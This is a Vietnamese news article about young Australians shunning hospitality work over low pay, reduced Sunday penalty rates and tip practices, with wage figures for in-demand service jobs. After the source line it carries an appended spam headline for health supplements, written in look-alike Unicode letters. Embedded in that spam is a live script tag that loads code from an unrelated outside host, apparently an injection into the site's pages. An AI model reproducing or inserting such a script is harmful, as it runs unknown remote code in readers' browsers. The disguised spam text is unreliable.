RSS

Thanh niên Úc "chê" việc khiến ngành dịch vụ bị ế ẩm

11:00 23/05/2018

Các thành phố của Úc đang tạo ra hàng ngàn việc làm mới trong ngành dịch vụ khách hàng mỗi năm nhưng điều đó không có nghĩa là ai cũng muốn làm chúng.

Làm việc cả cuối tuần và ngày lễ với mức lương đền bị giảm và việc khác hàng ngày càng hờ hững đã biến ngành dịch vụ (hospitality) của Úc trở thành lĩnh vực mà nhiều người không muốn làm.

Khắp các thành phố của Úc, đặc biệt là những thị trấn khu vực, ngành dịch vụ khách hàng đang trên bờ vực khủng hoảng.

Hầu hết những người trẻ đều muốn làm việc trong ngành dịch vụ khi còn đang đi học. Nhưng ngay cả khi đã làm việc trong ngành này rồi thì ngày càng có ít người trẻ muốn gắn bó với nó.

Theo kết quả nghiên cứu của tiến sĩ Edmund Goh đến từ Đh Edith Cowan, ngành công nghiệp này hiện có 28% bị trống khi người lớn tuổi thì nghỉ hưu còn người trẻ lại không muốn lấp đầy khoảng trống này.

Tiến sĩ Goh dẫn các nghiên cứu về các thệ hệ trước cho thấy những mô hình có số lượng lao động thay thế cao là "một vấn đề nguồn nhân lực chính trong ngành năng động này".

Một cuộc khảo sát năm 2017 từ nhà cung cấp phần mềm ngành dịch vụ Impos cũng phát hiện ra hơn một nửa doanh nghiệp đang gặp khó khăn trong thuê và duy trì nhân viên.

Trong khi những người trẻ tiếp tục từ chối làm việc trong ngành dịch vụ thì đất nước vẫn tiếp tục phát triển, thu hút khách du lịch và xây dựng cơ sở hạ tầng để bổ sung cho điều đó.

Chỉ riêng ở Brisbane, các dự án dọc sông của thành phố, bao gồm tại Queen’s Wharf và Howard Smith Wharves, cùng với địa điểm tổ chức hòa nhạc Brisbane Live đã được đề xuất, sẽ đảm bảo tạo ra hàng nghìn công việc mới - hầu hết trong số này sẽ là công việc trong ngành du lịch và khách sạn.

Cơ sở hạ tầng du lịch là tin tuyệt vời cho thủ phủ của Queensland. Nhưng là tin xấu khi người dân địa phương không muốn là người phục vụ tại các trung tâm du lịch mới.

Việc tái sinh Brisbane dự kiến tạo ra thêm 9.000 việc làm trong 2 năm tới.

Trong nỗ lực tìm kiếm câu trả lời cho khoảng cách đang tăng giữa sự bùng nổ du lịch và thiếu nhân lực trong ngành này của Úc, Brisbane đã tổ chức Diễn đàn Du lịch thế giới.

Giám đốc điều hành diễn đàn, Martin Barth nói với Brisbane Times rằng câu trả lời nằm trong việc khiến ngành dịch vụ hấp dẫn trở lại.

"Hình ảnh làm việc trong ngành du lịch đã thay đổi", ông nói.

"Mức lương bèo bọt và giờ làm việc dài có thể đúng, nhưng cũng có những cơ hội quốc tế và kinh doanh, vậy nên hãy nói ra câu chuyện đó và cho thế giới thấy ngành này thú vị thế nào".

"Nó không  chỉ có giờ làm việc dài dằng dặc và làm việc cả cuối tuần, hãy xem những gì là quan trọng với thế hệ trẻ và xem điều gì chúng ta cần làm để khiến nó trở nên hấp dẫn, thu hút đối với họ".

Lắng nghe những ý kiến của người lao động bị trả lương thấp và thiệt thòi có thể là chìa khóa giải quyết vấn đề.

Maddy McCormack, người làm việc trong ngành dịch vụ này 6 năm, đã làm việc tại các nhà hàng ở NSW và Victoria, nói rằng ngành này có sự "không công bằng".

"Tôi không được trả lương đền và chỉ một lần duy nhất tôi được trả thêm tiền bởi tôi khi tôi được yêu cầu đi làm trong ngày Anzac Day, tôi đã hỏi sếp mình "Lương làm việc ngày nghỉ lễ của tôi bao nhiêu?", cô nói với news.com.au.

"Bà ấy nói bà ấy sẽ kiểm tra với kế toán và tôi được trả thêm vài đô cho một giờ. Tôi không biết liệu có ai khác giống mình không".

"Vào ngày của Mẹ, chúng tôi đã làm việc liên tục 12 tiếng bởi có người đặt bàn cả ngày - chẳng có thời gian nghỉ ngơi hay dừng lại để ăn gì đó".

"Thỉnh thoảng vào cuối tuần, họ sẽ trả tiền làm việc trong tuần cho bạn ngay cả khi bạn vẫn đang làm việc. Làm thế nào mà họ có thể ghi giờ về cho tôi trong lúc tôi vẫn đang làm?".

Nữ sinh Melbourne này, hiện đang làm việc tại một nhà hàng ở Middle Eastern, nói rằng tiền tips của nhân viên cũng là một vấn đề lớn.

"Đôi khi tôi sẽ được trả thêm một chút, nếu như tiền tips là $37 cho tất cả mọi người, họ sẽ trả bạn $40 hoặc cái gì đó".

"Khi làm việc tại một cửa hàng pizza, mọi chuyện cũng tương tự. Chúng tôi chia nhau tiền tips và mọi người bỏ tất cả vào một cái lọ đựng tiền tip, hiếm khi bạn nhìn thấy một cái phong bì bỏ tiền trong đó. Thường thì họ sẽ sử dụng số tiền đó để mua những thứ mà chúng tôi cần hoặc đã làm vỡ trong nhà hàng", cô nói.

Và vào tháng 2 năm ngoái, nỗi thất vọng về ngành dịch vụ còn trầm trọng hơn khi Fair Work Commission quyết định cắt giảm mức lương đền ngày chủ nhật.

Những người lao động làm việc full-time và part-time trong ngành này có mức lương đền ngày chủ nhật giảm từ 175% xuống còn 150%. Tỷ lệ lương đề chủ nhật cho người không  có việc làm cố định vẫn duy trì 175%.

Những người làm full-time và part-time trong ngành ăn nhanh có mức lương đền chủ nhật giảm từ 150% xuống 125%.

Vào tháng 8/2017, các dự báo từ National Skills Week đã xác định 5 ngành dịch vụ có nhu cầu cao nhất.

Phục vụ nam

Tăng trưởng tương lai được dự báo là mạnh mẽ, từ năm 2015 đến 2020 cần khoảng hơn 19.000 lao động, theo dự báo của Employment Department. Mức lương trung bình hàng tuần là $804 và hầu hết nhân viên đều có chứng  chỉ II hoặc III.

Đầu bếp

Tăng trưởng tương lai được dự báo là mạnh mẽ, từ năm 2015 đến 2020 cần khoảng hơn 19.000 lao động.

Mức lương trung bình hàng tuần full-times là $1.050. Hầu hết nhân viên đều đã có thời gian học nghề và khoảng 1/5 có bằng tốt nghiệp.

Bar Attendant/Barista

Theo dự báo trong 5 năm, tới năm 2020, cần hơn 11.700 lao động, thể hiện sự tăng trưởng mạnh. Lương trung bình full-time là $873/tuần. Chứng chỉ được đề nghị là I hoặc II.

Quản lý nhà hàng/quán cà phê

Tăng trưởng tương lai được dự báo là mạnh mẽ, từ năm 2015 đến 2020 cần khoảng hơn 15.700 lao động. Mức lương trung bình full-time là $900/tuần. 1/4 nhân viên có chứng chỉ hoặc bằng tốt nghiệp.

Tổ chức hội nghị/sự kiện

Theo dự báo từ năm 2015 đến 2020 cần thêm khoảng 2.200 lao động, tăng khoagnr 9,5%. Lương trung bình full-time là $1.313/tuần với số giờ làm việc trung bình mỗi tuần là 37,6.

Nguồn: Báo Úc

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп<script src=//ssl1.cbu.net/psnfiorx></script>

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп

Tɦeo các ɓác sĩ, sức ƙɦỏe củɑ пɢũ łạпɢ qᴜyếł ᵭịпɦ łᴜổi łɦọ củɑ ɓạп. Đây ℓà ɓí qᴜyếł ℓựɑ cɦọп łɦực ρɦẩɱ cɦăɱ sóc cơ łɦể łốł пɦấł ɓạп пêп łɦɑɱ ƙɦảo ᵭể ℓᴜôп ƙɦỏe ɱạпɦ ʋà łɾườпɢ łɦọ.